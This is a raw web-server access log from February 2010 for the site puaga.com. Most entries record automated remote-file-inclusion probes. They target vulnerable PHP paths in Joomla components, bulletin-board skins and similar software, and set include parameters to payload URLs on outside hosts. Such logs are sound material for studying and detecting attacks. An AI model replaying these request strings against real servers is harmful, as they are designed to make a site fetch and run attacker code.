38.101.148.126 - - [12/Feb/2010:11:21:20 -0800] "GET /orange_g/forum/viewtopic.php?p=26547 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
220.232.237.122 - - [12/Feb/2010:11:21:51 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [12/Feb/2010:11:23:11 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [12/Feb/2010:11:23:16 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [12/Feb/2010:11:23:16 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [12/Feb/2010:11:23:16 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [12/Feb/2010:11:23:20 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [12/Feb/2010:11:23:20 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [12/Feb/2010:11:23:20 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [12/Feb/2010:11:23:20 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [12/Feb/2010:11:23:51 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [12/Feb/2010:11:23:51 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [12/Feb/2010:11:23:51 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [12/Feb/2010:11:23:51 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:24:39 -0800] "GET /logs/access_100130.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:24:39 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:24:39 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:24:44 -0800] "GET /logs/access_100202.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:25:28 -0800] "GET /logs/access_100109.log%20%20//bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:25:28 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:11:25:28 -0800] "GET /bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [12/Feb/2010:11:25:54 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [12/Feb/2010:11:26:04 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:11:26:11 -0800] "GET /logs/access_100202.log//calendar/tools/send_reminders.php?noSet=0&includedir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:11:26:12 -0800] "GET /calendar/tools/send_reminders.php?noSet=0&includedir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:11:26:12 -0800] "GET /logs//calendar/tools/send_reminders.php?noSet=0&includedir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
201.28.110.99 - - [12/Feb/2010:11:26:56 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [12/Feb/2010:11:27:01 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [12/Feb/2010:11:27:20 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN%20&catid=97&aid=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:11:33:04 -0800] "GET //skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:11:33:04 -0800] "GET /logs///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:11:33:05 -0800] "GET /logs/access_100105.log%20%20///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:34:54 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:34:54 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:34:54 -0800] "GET /logs/access_100203.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:11:34:59 -0800] "GET /src/page.php?dir.install=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:35:13 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:35:13 -0800] "GET /logs/access_100203.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:35:14 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:35:21 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:35:21 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:35:22 -0800] "GET /logs/access_100203.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:35:46 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:35:46 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:35:46 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:35:50 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:35:50 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:35:50 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:36:03 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:36:03 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:36:03 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:36:25 -0800] "GET /logs/access_100112.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:36:26 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:36:27 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:38:12 -0800] "GET /logs/access_100114.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:39:23 -0800] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:11:39:34 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:11:39:34 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:11:39:44 -0800] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:42:33 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:42:33 -0800] "GET /logs/access_100103.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:42:33 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:42:35 -0800] "GET /logs/access_100103.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:42:35 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:42:36 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:11:43:02 -0800] "GET /logs/access_100109.log///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:43:03 -0800] "GET /logs/access_100104.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:11:43:12 -0800] "GET /logs/access_100115.log///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:11:43:21 -0800] "GET /logs/access_100104.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:43:44 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:43:44 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:43:44 -0800] "GET /include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:43:44 -0800] "GET /include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:43:45 -0800] "GET /logs//include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:43:45 -0800] "GET /logs//include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
222.122.158.94 - - [12/Feb/2010:11:44:15 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sedu.co.kr/sh/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.158.94 - - [12/Feb/2010:11:44:15 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sedu.co.kr/sh/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.158.94 - - [12/Feb/2010:11:44:15 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sedu.co.kr/sh/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:44:22 -0800] "GET /include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:44:22 -0800] "GET /include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:53 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:53 -0800] "GET /logs/access_100130.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:53 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:53 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:53 -0800] "GET /logs/access_100130.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:53 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:57 -0800] "GET /logs/access_100202.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:44:57 -0800] "GET /logs/access_100202.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [12/Feb/2010:11:47:38 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sedu.co.kr/sh/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.158.94 - - [12/Feb/2010:11:48:22 -0800] "GET /logs/access_100115.log%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sedu.co.kr/sh/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:11:50:56 -0800] "GET /logs/access_100203.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:11:50:56 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:11:50:59 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:51:35 -0800] "GET /logs/access_100124.log//include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
194.63.235.157 - - [12/Feb/2010:11:51:36 -0800] "GET /logs/access_100124.log//include/prodler.class.php?sPath=http://srv-3lyk-ptolem.koz.sch.gr/tiki-keplinet/img/wiki/id???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:11:52:35 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:11:52:35 -0800] "GET /ideal/forum/viewtopic.php?p=27885 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:52:46 -0800] "GET /logs/access_100128.log//modules/mod_weather.php?absolute_path=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:52:47 -0800] "GET /modules/mod_weather.php?absolute_path=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:11:52:47 -0800] "GET /logs//modules/mod_weather.php?absolute_path=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:53:16 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:53:54 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:53:54 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:53:54 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:53:58 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:53:58 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:53:58 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:54:03 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:54:03 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:11:54:03 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:54:17 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [12/Feb/2010:11:54:17 -0800] "GET /logs/access_100103.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:11:55:21 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:11:55:22 -0800] "GET /orange_g/forum/viewtopic.php?p=27543 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
